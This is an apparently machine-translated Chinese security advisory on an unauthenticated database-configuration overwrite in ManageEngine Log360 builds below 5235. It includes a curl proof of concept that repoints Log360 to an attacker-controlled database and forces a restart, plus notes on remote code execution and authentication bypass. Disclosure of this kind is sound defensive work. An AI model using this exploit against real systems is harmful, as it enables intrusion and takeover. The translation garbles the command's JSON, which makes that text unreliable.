ManageEngine Log360数据库配置覆盖未经身份验证的远端控制设备

ManageEngine Log360构建< 5235受到不当访问控制漏洞允许数据库配置覆盖。未经过身份验证的远程攻击者发送一个精雕细琢消息Log360改变其后台数据库attacker-controlled数据库,并迫使Log360重启。攻击者可以利用这个漏洞来实现远程代码执行替换文件执行Log360启动。

的概念:

下面的命令试图改变Log360数据库配置< LOG360_DIR > \ conf \ database_params.conf指向一个attacker-controlled数据库并重启Log360。

curl ki - d '操作= changeDB¶ms ={“迁移”:假的,“重启”:真的,“UNAME”:“攻击者”,“域”:“MyDomain”,“密码”:“<密码>”,“SERVER_NAME”:“< attacker-db-host >”,“SERVER_PORT”: 33395年,“服务器”:“postgres”、“分贝”:“log360”、“INSTANCE_NAME”:“MyInstance”}“http:// < log360-host >: 8095 / RestAPI / ChangeDBAPI

安全影响包括但并不仅限于:

• 拒绝服务(合法用户可能不再能够登录Log360)
• 认证绕过因为“Log360认证”的登录凭证域现在存储在attacker-controlled数据库。攻击者可以登录Log360因为他/她知道凭据。
• REST API绕过限制。adsproductapis表Log360数据库中定义了一个REST api允许列表。攻击者可以添加更多的REST api,让攻击者更多的攻击向量添加api可能包含漏洞。